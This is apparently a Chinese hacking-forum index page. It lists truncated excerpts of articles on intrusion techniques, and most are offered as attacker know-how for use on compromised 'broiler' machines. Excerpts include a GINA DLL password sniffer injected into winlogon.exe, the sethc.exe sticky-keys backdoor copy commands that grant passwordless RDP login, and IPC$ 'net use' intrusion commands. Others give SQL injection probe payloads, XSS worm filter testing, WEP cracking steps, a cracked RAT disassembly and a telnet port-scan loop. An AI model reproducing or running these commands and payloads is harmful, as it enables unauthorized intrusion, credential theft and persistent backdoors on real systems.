GINA PassWord Sniffer(截取登陆密码)
GINA PassWord Sniffer(截取登陆密码)
dll源码,编译后插入winlogon.exe进程即可记录登陆密码记录。
需要在相同目录保存一个ntuserlog.config的配置文件,如:
enable=1
cmdline=cmd.exe
password=Ghash
logfile=c:\windows\sysem32\userpwdlog.log
文件末尾的
查看全部...
破解无线路由密码总结
1、打开终端,建立一个目录
mkdir spoonwep2
2、将 spoopwep2.lzm里面的文件解压缩到刚刚建立的文件夹中。
lzm2dir spoonwep2.lz
查看全部...
自动投票源代码
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, ExtCtrls, OleCtrls, SHDocVw,Tlhelp32;
type
TForm1 = [标记错误:class]
&
查看全部...
XSS攻击防御技术白皮书
1、什么是XSS攻击
XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控
查看全部...
灰鸽子VIP 2007 本地完美破解
0056DD91 33C0 xor eax, eax
0056DD93 55
查看全部...
黑客入侵常用DOS命令,不知管理员是否熟悉
net use \ip\ipc$ " " /user:" " 建立IPC空链接
net use \ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \ip\c$ "密码" /user:"用户名" 直接登陆后
查看全部...
黑客用来突破防火墙的几种常用技术
一、防火墙基本原理
首先,我们需要了解一些基本的防火墙实现原理。防火墙目前主要分包过滤,和状态检测的包过滤,应用层代理防火墙。但是他们的基本实现都是类似的。
│ │---路由器-----网卡│防火墙│网卡│----------内部网络│ │
防火墙一般有两个以上的网络卡,一个连到外部(router),另一个是连到内部网络。当打开主机网络转发功能时,两
查看全部...
SQL 注入语句
1.判断有无注入点
' ; and 1=1 and 1=2
2.猜表: 常见的表:admin adminuser user pass password 等..
and 0<>(select [标记错误:count] from *)
and 0<>(select [标记错误:count] from admin) ---判断是否存在admin这张表
3.猜帐号数目 如果遇到0
查看全部...
一篇关于社会工程学的文章
周末无聊,和眼圈聊天,告诉他我在用社会工程搞一个站点,真是没想到他竟然也在忙这个,我搞的是ARM产品的,拿到了系统管理员的密码。他竟然是在搞一个IDC公司,而且已经获得整个机房的管理员权限。看来目前的社会工程是很火的,本着发扬共享精神得原则,我们把自己的一点心得发出来,供大家参考,不足之处,还望大家多多指教。
渗透方式::通过网络聊天获取对方服务器帐号密码等
查看全部...
用GetHashes软件获取Windows系统Hash密码值
对入侵者来说,获取Windows的口令是整个攻击过程至关重要的一环,拥有系统原来用户的口令,将使得内网渗透和守控更加容易。Windows系统中的Hash密码值主要有LM-HASH以及NTLM-HASH值两部分构成,一旦入侵者获取了系统的Hash值,通过LC5以及彩虹表等破解工具可以很快的获取系统的密码。本文主要作为其中的一个子课题,探讨如何使用Gethashes工具来获取系统的Hash值,并对Ha
查看全部...
最酷的windows后门 无需输入密码登陆3389
在肉鸡上执行命令
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
以后再连接肉鸡3389,敲5下shift键就可以直接进入了,无需输入密码,
查看全部...
XSS wrom网站如何实现入侵
1. 测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,\/前是真正的空格),在个人档案处看过滤了哪些。
’’;:!--"<javascript JAvaSCriPT>=&#{()} \/
结果
’’;:!--"=&#{()} // (&
查看全部...
命令提示符下管理 Windows XP 防火墙
命令:netsh firewall 输入命令回车后 问号?可以现实帮助,分级操作
参数:
? // 显示命令列表
add // 添加防火墙配置
delete // 删除防火墙配置
dump // 显示一个配置脚本
help // 显示命令列表
reset // 将防火墙配置重置为默认值。
set // 设置防火墙配置
s
查看全部...
不需要任何工具,DOS命令扫描一个网段的全部端口
在Windows2000/XP/2003的DOS窗口,
执行 for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389
探测网段内开启3389端口的主机。
执行后,会打开254个小口。链接失败的窗口会自动退出,剩下的窗口就是开放3389端口的主机了。
如果你觉得机器性能很好的话 可以把/low参
查看全部...
就业信息